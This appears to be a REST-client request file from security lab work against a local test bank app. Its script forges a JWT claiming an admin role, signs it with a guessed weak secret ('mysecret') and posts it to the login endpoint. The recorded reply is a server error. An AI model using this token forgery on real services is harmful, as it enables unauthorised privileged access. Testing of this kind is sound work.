@host=http://bank.selv.local:81
###
GET /api/health
###
{{
const crypto = require('crypto');

const header = {
  "alg": "HS256",
  "typ": "JWT"
}
const encodedHeaders = btoa(JSON.stringify(header))

const claims = {
    "role": "admin"
}
const encodedPayload = btoa(JSON.stringify(claims))

const encodedSignature = crypto.createHmac('sha256', "mysecret").update(`${encodedHeaders}.${encodedPayload}`).digest("base64url")

console.log(encodedSignature);
const jwt = `${encodedHeaders}.${encodedPayload}.${encodedSignature}`;
console.log(jwt);
exports.jwt = jwt
}}

POST /api/auth
Content-Type: application/x-www-form-urlencoded

id_token={{jwt}}

HTTP/1.1 500  - Internal Server Error
content-length: 1180
content-security-policy: default-src 'none'
content-type: text/html; charset=utf-8
date: Mon, 29 Apr 2024 16:18:21 GMT
x-content-type-options: nosniff
x-powered-by: Express
connection: close